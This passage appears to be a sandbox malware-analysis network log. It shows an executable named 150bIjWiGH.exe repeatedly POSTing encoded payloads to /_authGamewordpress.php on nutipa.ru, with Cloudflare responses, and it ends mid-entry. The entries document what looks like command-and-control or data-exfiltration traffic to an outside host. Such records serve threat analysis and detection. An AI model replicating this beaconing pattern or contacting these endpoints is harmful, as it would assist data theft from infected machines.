                                                            Dec 15, 2024 19:36:42.826088905 CET2536OUTData Raw: 50 51 46 5f 5a 5b 58 56 5d 5a 56 51 50 5a 57 55 55 50 5e 44 5a 53 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQF_Z[XV]ZVQPZWUUP^DZS[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z+.-=#?&E)=87Y+&1&9U>#0-6? )T8;.F'#P /
                                                            Dec 15, 2024 19:36:43.572362900 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:43.808235884 CET798INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCaK8XOFPpXYB2EFDwOrD3b%2FS1lczofqYJolb%2BqvupOdATtkIRNGw%2FDMoWoF0YALZ234eNV9NWc2ufDnnF7WkwUavGu%2FJf1pwMf7TurIFLJ%2FumuVTPFWpmPjsbk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a735b3343a3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4390&min_rtt=1629&rtt_var=6134&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=61548&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.449760104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:44.056881905 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:44.404248953 CET2536OUTData Raw: 55 50 43 5f 5f 5b 5d 52 5d 5a 56 51 50 5b 57 56 55 56 5e 46 5a 56 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPC__[]R]ZVQP[WVUV^FZV[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+9**Y!9<=[!?2>-19)/X'-:< >;.F'#P +
                                                            Dec 15, 2024 19:36:45.143028975 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:45.387346983 CET797INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ1TEmc2FIK9YiRO1JN3lOK1ewihy9uS2sKcrMgPe%2FJ9oM89Av%2FnaWBxk%2B6FyVwg4FjNU7rQ8iw1SStFH9xRq5egm57izcTdfXFh%2BIgBMFgkuScID6W4S72ijXA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a7d3c7b8c96-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3654&min_rtt=2230&rtt_var=3684&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=107179&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.449761104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:45.369661093 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:45.716994047 CET1420OUTData Raw: 55 57 43 5a 5f 59 58 53 5d 5a 56 51 50 59 57 5a 55 54 5e 44 5a 50 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCZ_YXS]ZVQPYWZUT^DZP[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+-=*6<@([+[7?2>"]19V*U#Y%._(3&,.F'#P #
                                                            Dec 15, 2024 19:36:46.460722923 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:46.721240997 CET941INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdEsRwhSiWA6LVTKunA5143Pe3b5GJ%2FjTYpw31xel8yG1rZY%2Bg9WURwcA4uu4ztxPLlao9wr7RGFYUk9qo8hq6b3MaTYEvlGD5Qt4f6LBe4EH7KZ4O1FnigLWTc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a8569900f73-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4467&min_rtt=1618&rtt_var=6306&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=59799&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 00 21 2a 25 0b 37 3e 01 0d 2d 05 32 09 28 30 05 1d 27 0b 22 02 24 01 3b 58 3e 13 2b 1c 31 2a 21 5e 34 1c 2e 09 3c 51 3d 12 26 1c 21 51 03 11 22 13 24 2d 30 5d 2b 39 0e 16 24 31 2c 06 31 04 24 14 2b 28 00 1c 26 38 0d 53 22 3e 3f 0f 3a 03 38 58 28 2a 0e 06 2e 58 36 55 23 0c 2e 53 0c 17 25 10 3c 39 2e 13 20 0b 3e 0c 24 12 19 53 20 07 32 1f 3d 20 34 1c 33 0d 2f 56 26 2e 38 14 21 33 35 50 24 29 21 06 23 0c 03 08 29 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:!*%7>-2(0'"$;X>+1*!^4.<Q=&!Q"$-0]+9$1,1$+(&8S">?:8X(*.X6U#.S%<9. >$S 2= 43/V&.8!35P$)!#)"%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449762104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:45.634032965 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:45.982326984 CET2536OUTData Raw: 55 53 43 5a 5f 56 58 51 5d 5a 56 51 50 50 57 55 55 51 5e 46 5a 55 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCZ_VXQ]ZVQPPWUUQ^FZU[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$?=Y>\#X!.E+-X!/&!%=>=0?_36<!/.F'#P
                                                            Dec 15, 2024 19:36:46.721443892 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:47.005464077 CET791INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTMbKTRkEKTz9QEwfxqkEed7WBCrDzPdjB0Go8ednnS2Y1keZqGwxj4l5N7KoLdQvlUEWLQalo2b4HbqigstvrQH2QI%2Bn2IaQRrMoS5uw2Q3lKtY84g4GE8f2yw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a870c294392-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3173&min_rtt=1677&rtt_var=3621&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=106991&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.449763104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:47.397589922 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:47.747931957 CET2536OUTData Raw: 55 55 46 5a 5a 5a 5d 52 5d 5a 56 51 50 5b 57 55 55 50 5e 48 5a 55 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUFZZZ]R]ZVQP[WUUP^HZU[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$)>1= ",%(3[4;&%X-),3*Y?#5/.F'#P +
                                                            Dec 15, 2024 19:36:48.488642931 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:48.739379883 CET799INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QCEEA2TdyC6OBa%2FoifRhssbgLt%2B2RMaGrTjfZgoa5htXclWaEYQ6tnBGwznis2kvyFtz5ci1qnkHF6KbK%2FBtqtZ33%2BpEatIK2LDgZmnqk%2BZTDrxLMd1So9EuQTg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a921f564379-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2928&min_rtt=1682&rtt_var=3124&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=125246&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449764104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:48.981509924 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:49.326411963 CET2536OUTData Raw: 55 57 43 5b 5a 5b 5d 51 5d 5a 56 51 50 5a 57 50 55 53 5e 40 5a 53 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWC[Z[]Q]ZVQPZWPUS^@ZS[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+*_>)<5<&<7<11%!P*3Z%..\+39-+.F'#P /
                                                            Dec 15, 2024 19:36:50.070393085 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:50.312042952 CET795INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvKLmQoCPv1ryMJSlrxC7PYXtTXsLF%2FxRzVXuu5uSXVru9rs4nm3Z3xJ458Gq08hr%2F8SKiSobPhL6qgvdpZqK8QZ208Ll0der16A6vS6qR%2Bxpyksv3q6xu8jkAQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a9bf87842a7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6681&min_rtt=1661&rtt_var=10664&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=34905&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.449765104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:50.581423044 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.449766104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:50.828325987 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:51.187767029 CET2536OUTData Raw: 55 55 46 5a 5f 57 5d 55 5d 5a 56 51 50 59 57 51 55 56 5e 40 5a 54 5b 5b 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUFZ_W]U]ZVQPYWQUV^@ZT[[\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$)-):;5*?[4 /#%-92-&*0$"Y(09R/.F'#P #
                                                            Dec 15, 2024 19:36:51.923800945 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:52.207075119 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vqu%2BOYHdCGeENmO44%2F3zNqUu2NjRkmoXVDt3Xz%2FdMVZAX6JFiHvkszmkU5rzEccJiLE2Ptns5DMxs5tguLDiaL6G8Z5AbvPE96OWU61atZeFfggvh7mL8qclVA0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aa799524364-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3870&min_rtt=2293&rtt_var=4015&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=97901&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.449767104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:51.854578018 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:52.201206923 CET1420OUTData Raw: 50 55 43 59 5f 59 5d 53 5d 5a 56 51 50 5a 57 57 55 54 5e 47 5a 56 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUCY_Y]S]ZVQPZWWUT^GZV[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^(9):;"Z*A<7Z4??12>V>#Z%="^+1T8+.F'#P /
                                                            Dec 15, 2024 19:36:52.939788103 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:53.207962036 CET948INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTKXVTL0GE8%2B818zNDxDj%2Fv2Taj8xuc7FPXIMsbKot0Px%2FYlw1MOFafCiWslTI%2BvJP8UfZxf8Ayeoz4c8c7hWeM4THylsQ0V3w4ocPjJTrHtfiVRk8rv%2FuwzsXE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aadecb043b9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3177&min_rtt=1703&rtt_var=3586&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=108188&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 21 2a 32 56 20 2e 34 55 3a 3c 25 50 3c 30 37 18 24 54 25 5f 27 01 3b 14 3d 3d 09 53 31 2a 29 12 20 21 21 1d 3e 27 36 05 26 0c 21 51 03 11 22 5e 26 00 0e 5a 3d 07 24 5f 26 0f 0d 16 26 3d 0d 06 2a 2b 25 0f 26 28 20 0c 23 10 06 52 3a 03 27 01 2b 14 34 06 39 58 31 0d 20 36 2e 53 0c 17 25 59 3c 39 08 13 37 0c 18 0c 27 3c 3f 1e 21 3a 25 0e 3e 0d 2c 56 30 0a 3c 0b 26 2e 1a 19 35 23 25 19 31 3a 0c 10 23 0c 2d 0e 3d 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:!*2V .4U:<%P<07$T%_';==S1*) !!>'6&!Q"^&Z=$_&&=*+%&( #R:'+49X1 6.S%Y<97'<?!:%>,V0<&.5#%1:#-=%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.449768104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:52.445888042 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:52.794797897 CET2536OUTData Raw: 55 55 43 5a 5f 5c 5d 54 5d 5a 56 51 50 5c 57 50 55 50 5e 48 5a 55 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCZ_\]T]ZVQP\WPUP^HZU[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z??*;6,>B<=+ /2->'>>= 3Y0..X?3),.F'#P 7
                                                            Dec 15, 2024 19:36:53.531693935 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:53.789135933 CET790INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uUXjxfIzY0sILGwWCuLwfLXBFSkZk8dCblO8iUkpXIVFh5wDChUAlfh0E0KhSaUq89eTbcCGrIVtmzm9loTHP2SRcK3RWFe55otKhR0m3qGERlYJCzHyOpLXO%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ab19a7542e2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3350&min_rtt=1650&rtt_var=4018&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=95737&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.449769104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:54.049393892 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:54.404861927 CET2536OUTData Raw: 50 56 43 5d 5f 59 58 51 5d 5a 56 51 50 5a 57 57 55 50 5e 43 5a 53 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
